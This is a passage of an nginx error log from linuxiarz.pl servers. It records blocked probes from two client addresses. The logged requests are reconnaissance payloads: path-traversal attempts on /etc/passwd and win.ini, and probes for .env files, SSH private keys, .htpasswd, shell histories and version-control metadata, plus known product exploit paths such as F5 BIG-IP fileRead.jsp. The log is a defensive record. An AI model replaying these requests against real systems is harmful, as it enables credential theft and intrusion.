/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/16 23:58:36 [error] 1236#1236: *2357 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/windows/win.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:00:30 [error] 1236#1236: *2456 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET //content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:00:43 [error] 1236#1236: *2501 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /js/../.htpasswd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:01:09 [error] 1236#1236: *2530 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:01:21 [error] 1236#1236: *2549 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.drone.yml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:03:37 [error] 1236#1236: *2702 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1", host: "nginx.linuxiarz.pl:443" +2025/06/17 00:04:32 [error] 1236#1236: *2801 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:05:08 [error] 1236#1236: *2853 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /php/utils/CmsGetDeviceSoftwareVersion.php/.js.map HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:06:53 [error] 1236#1236: *2971 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:06:54 [error] 1236#1236: *2972 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:06:54 [error] 1236#1236: *2973 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:06:54 [error] 1236#1236: *2974 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:06:54 [error] 1236#1236: *2975 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:06:54 [error] 1236#1236: *2976 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:06:54 [error] 1236#1236: *2977 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:06:54 [error] 1236#1236: *2978 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:06:54 [error] 1236#1236: *2979 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:06:54 [error] 1236#1236: *2980 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:06:54 [error] 1236#1236: *2981 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:06:55 [error] 1236#1236: *2982 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:14 [error] 1236#1236: *2987 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:19 [error] 1236#1236: *2992 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:19 [error] 1236#1236: *2993 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:19 [error] 1236#1236: *2994 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:19 [error] 1236#1236: *2995 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:20 [error] 1236#1236: *2996 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:20 [error] 1236#1236: *2997 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:20 [error] 1236#1236: *2998 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:20 [error] 1236#1236: *2999 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:20 [error] 1236#1236: *3000 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:20 [error] 1236#1236: *3001 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:20 [error] 1236#1236: *3003 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:20 [error] 1236#1236: *3004 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:20 [error] 1236#1236: *3006 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:20 [error] 1236#1236: *3007 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:21 [error] 1236#1236: *3008 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:21 [error] 1236#1236: *3009 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:21 [error] 1236#1236: *3010 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:21 [error] 1236#1236: *3011 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:21 [error] 1236#1236: *3012 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:21 [error] 1236#1236: *3013 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:21 [error] 1236#1236: *3014 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.env.nginx HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:59 [error] 1236#1236: *3035 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:59 [error] 1236#1236: *3036 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_dsa HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:59 [error] 1236#1236: *3040 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_1024 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:59 [error] 1236#1236: *3041 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_2048 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:59 [error] 1236#1236: *3042 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_3072 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:59 [error] 1236#1236: *3043 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa_4096 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:07:59 [error] 1236#1236: *3044 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_ed25519 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:11:38 [error] 1236#1236: *3339 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:13:31 [error] 1236#1236: *3492 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:14:05 [error] 1236#1236: *3525 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ftpconfig HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:18:08 [error] 1236#1236: *3746 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:19:13 [error] 1236#1236: *3775 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:23:20 [error] 1236#1236: *3935 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:24:38 [error] 1236#1236: *4037 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:24:45 [error] 1236#1236: *4043 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:27:34 [error] 1236#1236: *4243 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /hex/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:29:57 [error] 1236#1236: *4325 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.config/sftp.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:30:06 [error] 1236#1236: *4333 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.vscode/sftp.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:33:24 [error] 1236#1236: *4559 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:34:49 [error] 1236#1236: *4648 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:35:37 [error] 1236#1236: *4695 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:38:01 [error] 1236#1236: *4809 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /php/ztp_gate.php/.js.map HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:38:47 [error] 1236#1236: *4842 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "https://nginx.linuxiarz.pl:443" +2025/06/17 00:39:54 [error] 1236#1236: *4900 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:55:59 [error] 1236#1236: *5994 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:56:05 [error] 1236#1236: *6000 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:56:43 [error] 1236#1236: *6013 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.example.com HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:58:33 [error] 1236#1236: *6121 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ksh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:58:57 [error] 1236#1236: *6144 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.sh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 00:59:08 [error] 1236#1236: *6152 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.zsh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 09:54:48 [error] 1236#1236: *49693 access forbidden by rule, client: 78.153.140.222, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 09:54:50 [error] 1236#1236: *49710 access forbidden by rule, client: 78.153.140.222, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 09:54:53 [error] 1236#1236: *49726 access forbidden by rule, client: 78.153.140.222, server: nginx.linuxiarz.pl, request: "GET /dev/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 09:54:56 [error] 1236#1236: *49731 access forbidden by rule, client: 78.153.140.222, server: nginx.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 09:54:57 [error] 1236#1236: *49736 access forbidden by rule, client: 78.153.140.222, server: nginx.linuxiarz.pl, request: "GET /laravel/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 09:54:58 [error] 1236#1236: *49746 access forbidden by rule, client: 78.153.140.222, server: nginx.linuxiarz.pl, request: "GET /.config.yaml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 09:54:59 [error] 1236#1236: *49747 access forbidden by rule, client: 78.153.140.222, server: nginx.linuxiarz.pl, request: "GET /backend/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 09:55:01 [error] 1236#1236: *49749 access forbidden by rule, client: 78.153.140.222, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 09:55:01 [error] 1236#1236: *49751 access forbidden by rule, client: 78.153.140.222, server: nginx.linuxiarz.pl, request: "GET /web/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 09:55:02 [error] 1236#1236: *49753 access forbidden by rule, client: 78.153.140.222, server: nginx.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 09:55:02 [error] 1236#1236: *49754 access forbidden by rule, client: 78.153.140.222, server: nginx.linuxiarz.pl, request: "GET /staging/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 09:55:04 [error] 1236#1236: *49759 access forbidden by rule, client: 78.153.140.222, server: nginx.linuxiarz.pl, request: "GET /core/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 09:55:09 [error] 1236#1236: *49763 access forbidden by rule, client: 78.153.140.222, server: nginx.linuxiarz.pl, request: "GET /images/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 09:55:10 [error] 1236#1236: *49764 access forbidden by rule, client: 78.153.140.222, server: nginx.linuxiarz.pl, request: "GET /.env.save.1 HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 09:55:12 [error] 1236#1236: *49765 access forbidden by rule, client: 78.153.140.222, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 09:55:13 [error] 1236#1236: *49766 access forbidden by rule, client: 78.153.140.222, server: nginx.linuxiarz.pl, request: "GET /API/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/17 09:55:13 [error] 1236#1236: *49767 access forbidden by rule, client: 78.153.140.222, server: nginx.linuxiarz.pl, request: "GET /app/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/19 22:34:15 [error] 1236#1236: *392475 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/19 22:34:15 [error] 1236#1236: *392476 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.svn/wc.db HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/19 22:34:15 [error] 1236#1236: *392477 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.gh/store/00manifest.i HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 08:57:40 [error] 1236#1236: *433575 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 08:58:18 [error] 1236#1236: *433677 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.python-eggs HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 08:58:38 [error] 1236#1236: *433707 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 08:59:04 [error] 1236#1236: *433755 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.listing HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 08:59:10 [error] 1236#1236: *433760 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 08:59:10 [error] 1236#1236: *433762 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.svn/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 08:59:42 [error] 1236#1236: *433819 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.idea/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:00:16 [error] 1236#1236: *433912 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:00:28 [error] 1236#1236: *433938 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.fontconfig/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:01:08 [error] 1236#1236: *434054 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.grunt/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:01:18 [error] 1236#1236: *434082 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:01:32 [error] 1236#1236: *434110 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.cache/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:01:45 [error] 1236#1236: *434146 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.settings HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:01:57 [error] 1236#1236: *434184 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:02:02 [error] 1236#1236: *434204 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.komodotools/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:02:04 [error] 1236#1236: *434210 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.inst/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:02:19 [error] 1236#1236: *434247 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:02:25 [error] 1236#1236: *434271 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.komodotools HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:02:29 [error] 1236#1236: *434279 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.pass HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:02:30 [error] 1236#1236: *434285 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.hg HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:02:57 [error] 1236#1236: *434347 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.zip HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:03:39 [error] 1236#1236: *434481 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:03:47 [error] 1236#1236: *434497 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.mc HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:03:52 [error] 1236#1236: *434519 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.mc/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:03:55 [error] 1236#1236: *434528 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:03:59 [error] 1236#1236: *434545 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.idea HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:04:07 [error] 1236#1236: *434569 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:04:08 [error] 1236#1236: *434573 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.codekit-cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:04:14 [error] 1236#1236: *434597 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.user.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:04:14 [error] 1236#1236: *434601 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:04:21 [error] 1236#1236: *434629 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.c9/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:52:09 [error] 1236#1236: *437591 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.codekit-cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:52:10 [error] 1236#1236: *437593 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.idea/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:52:12 [error] 1236#1236: *437600 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.pass HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:52:14 [error] 1236#1236: *437612 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.komodotools/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:52:14 [error] 1236#1236: *437614 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:52:20 [error] 1236#1236: *437628 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.mc HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:52:21 [error] 1236#1236: *437629 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.user.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:52:41 [error] 1236#1236: *437720 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.python-eggs HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:52:41 [error] 1236#1236: *437721 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.idea HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:52:43 [error] 1236#1236: *437728 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:52:44 [error] 1236#1236: *437730 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:52:54 [error] 1236#1236: *437757 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:53:10 [error] 1236#1236: *437813 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:53:15 [error] 1236#1236: *437833 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:53:16 [error] 1236#1236: *437837 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.mc/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:53:20 [error] 1236#1236: *437846 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.hg HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:53:40 [error] 1236#1236: *437898 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.zip HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/06/20 09:53:43 [error] 1236#1236: *437899 access 